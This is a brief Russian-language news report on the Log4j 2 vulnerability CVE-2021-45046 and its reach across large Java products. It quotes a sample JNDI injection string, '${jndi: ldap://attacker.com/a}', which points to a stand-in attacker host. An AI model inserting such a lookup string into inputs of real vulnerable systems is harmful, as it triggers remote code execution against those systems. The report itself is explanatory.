Информация о новой уязвимости CVE-2021-45046 в популярной библиотеке журналирования Log4j 2, позволяющей запустить произвольный код атакующего на компьютере с приложением, использующим Log4j, опубликована 14 декабря на сайте Apache Foundation.ИА Красная Весна
Вместо прямой вставки вида «${jndi: ldap://attacker.com/a}» используется промежуточный этап с использованием переменных форматирования вывода в журнал.ИА Красная Весна
Библиотека Log4j используется в большинстве крупных программных продуктах на языке программирования Java.ИА Красная Весна
Например, уязвимости Log4j затрагивают хотя бы один из программных продуктов 65 из 100 компаний списка Fortune 100.ИА Красная Весна